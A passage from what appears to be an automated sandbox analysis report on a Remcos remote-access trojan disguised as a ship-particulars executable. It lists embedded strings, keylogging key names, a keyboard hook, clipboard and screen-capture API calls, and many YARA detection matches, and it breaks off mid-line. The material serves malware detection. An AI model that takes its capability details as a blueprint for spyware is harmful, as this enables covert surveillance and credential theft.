          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_0040221C
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
          Source: svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
          Source: svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.304901639.00000000067D2000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.399440395.0000000006050000.00000002.00000001.sdmp, svchosts.exe, 00000017.00000002.413602162.0000000005CA0000.00000002.00000001.sdmp, svchosts.exe, 00000019.00000002.428241872.00000000059D0000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Contains functionality to capture and log keystrokes
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Esc] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Enter] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Tab] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Down] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Right] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Up] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Left] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [End] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [F2] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [F1] 17_2_004043BF
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: [Del] 17_2_004043BF
          Installs a global keyboard hook
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\remcos\svchosts.exe
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,17_2_004050FC
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_0040D71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_004038DB GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,17_2_004038DB

          E-Banking Fraud:

          Yara detected Remcos RAT
          Source: Yara match File source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 1632, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 5020, type: MEMORY
          Source: Yara match File source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara match File source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 5888, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 4936, type: MEMORY
          Source: Yara match File source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@AB